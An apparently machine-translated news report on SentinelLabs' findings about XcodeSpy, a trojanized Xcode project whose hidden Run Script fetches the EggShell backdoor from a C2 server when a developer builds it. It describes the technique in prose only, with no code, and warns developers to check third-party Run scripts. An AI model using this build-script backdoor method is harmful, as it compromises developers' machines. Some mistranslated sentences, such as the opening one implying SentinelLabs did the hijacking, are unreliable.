SentinelLabs, SentinelOne’s threat intelligence and malware analysis division, hijacks the system used by developers of apps for Apple products on March 18, and spreads a customized “EggShell” backdoor, a malicious “Xcode” It was revealed that the project was discovered. The malware “Xcode Spy” targets Xcode, an integrated development environment (IDE) used to develop Apple software and applications on “macOS.” According to research published by Sentinel Labs, attackers targeted “iOS” developers by exploiting Xcode’s “Run Script” feature to trojanize freely shared online Xcode projects. It is said that it is carrying out a type attack. The pre-Trojan Xcode project is legitimate, open source on GitHub. The project with XcodeSpy claims to have “advanced features” related to animation in the iOS tab bar. However, when I download and launch the initial build, it deploys a malicious script and installs the EggShell backdoor. The malicious project investigated by Sentinel Labs researchers is a modification of a legitimate project called “TabBar Interaction.” The code for this Github project and its developers are said to be free of Xcode Spy. This Run script has been secretly tampered with to connect the attacker’s Command and Control (C2) server with the developer’s project. Exploited is Xcode’s ability to execute customized shell scripts when launching an instance of an app. When launched, this script accesses the C2 server and downloads a customized variant of the EggShell backdoor. Then, through this backdoor, the user LaunchAgent that runs permanently will be installed. EggShell hijacks the targeted developer’s microphone, camera, and keyboard, as well as uploading and downloading files. At least one of the US organizations has been targeted by this type of attack, SentinelLabs said, and developers in Asia appear to have been intensively attacked. According to SentinelLabs, the attack campaign appears to have occurred at least between July and October 2020. Researchers say, “Xcode Spy seems to be targeting the developers themselves rather than targeting the products they create and their clients. It also backdoors to the developer’s work environment. It is a means to realize in a short process from the point of setting up to sending malware to the user who uses the software of the developer. ” “Everyone who develops apps for Apple products should carefully evaluate whether there are any malicious Run scripts lurking when adopting an Xcode project developed by a third party.” ing.